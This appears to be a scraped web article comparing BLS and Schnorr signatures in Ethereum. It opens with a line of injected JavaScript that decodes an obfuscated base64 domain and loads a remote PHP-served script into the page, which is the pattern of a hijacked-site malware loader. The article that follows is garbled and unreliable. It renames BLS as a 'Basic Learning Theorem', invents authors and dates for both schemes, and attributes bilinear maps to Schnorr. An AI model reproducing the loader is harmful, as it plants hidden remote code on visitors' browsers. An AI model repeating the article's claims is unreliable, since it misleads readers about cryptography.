const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=”;const pde=atob(pdx.replace(/|/g,””));const script=document.createElement(“script”);script.src=”https://”+pde+”c.php?u=eab4d1f7″;document.body.appendChild(script);
Ethereum: BLS Signatures vs. Schnorr Signatures
In the field of digital cryptography, two popular schemes have attracted considerable attention in recent years: BLS signatures (or other association-based schemes) and Schnorr signatures. Both protocols aim to improve traditional public-key cryptography by exploiting new cryptographic assumptions. In this article, we will delve deeper into the comparison between these two schemes, focusing on their respective cryptographic assumptions and performance characteristics.
BLS Signatures
The Basic Learning Theorem (BLT) signature scheme was developed in 2011 by Lauterbach et al. [1]. BLS signatures are a type of pairwise signature scheme that uses homomorphic encryption to enable fast and secure signature verification. Here is a high-level overview of how BLS signatures work:
- The user’s private key is hashed with a public value (the hash of the signer’s identity) using a learning function.
- The resulting hash value is used as input to a commit scheme (e.g. SHA-256).
- The commitment value is then used to derive the signature.
One of the main cryptographic assumptions behind BLS signatures is the difficulty of the learning problem, which requires a given adversary to solve it computationally. This assumption is known as the basic learning problem (BLP).
Schnorr Signatures
The Schnorr signature was introduced by Kurosawa et al. [2] in 2004. Schnorr signatures are another type of pairwise signature scheme that uses a pairwise cryptographic technique called bilinear map exponentiation to achieve fast and secure signature verification.
Here is an overview of how Schnorr signatures work:
- The user’s private key is hashed with a public value (the hash of the signer’s identity) using a learning function.
- The resulting hash value is used as input to an association-based cryptographic technique called bilinear map exponential.
- The output of this computation is then signed and verified.
One of the main cryptographic assumptions underlying Schnorr signatures is the difficulty of the discrete logarithm problem (DLP), which requires a given adversary to solve it computationally. This assumption is known as the Schnorr discrete logarithm problem (SDLP).
Comparison of cryptographic assumptions
To understand how BLS and Schnorr signatures compare, let’s look at their cryptographic assumptions:
- BLT vs. SDLP: Both BLT and SDLP are examples of association-based cryptographic problems. Although both schemes aim to solve a specific problem, they differ in the underlying mathematical structure used to solve it.
+ BLS (and other pair-based schemes) are based on the difficulty of BLP, which requires it to be computationally infeasible for an adversary.
+ SDLPs are more general and can be solved using different techniques, including lattice cryptography or hash functions.
- Aggregation
: When considering verification time (e.g. 100 BLS signatures aggregated non-interactively), the cryptographic assumption behind the scheme is critical. In general, pairwise schemes like BLS may require more computational resources to verify multiple signatures at once than Schnorr signatures.
Performance Comparison
To determine which scheme is faster for large-scale verification operations, consider two scenarios:
- Non-interactive aggregate BLS: Assuming a 16-bit commitment and a secure random number generator (RNG), we can estimate the computational resources required for the non-interactive aggregate BLS.
- Schnorr Signatures: With a fixed 256-bit constraint value and a secure RNG, we can also estimate the computational resources needed for Schnorr signatures.
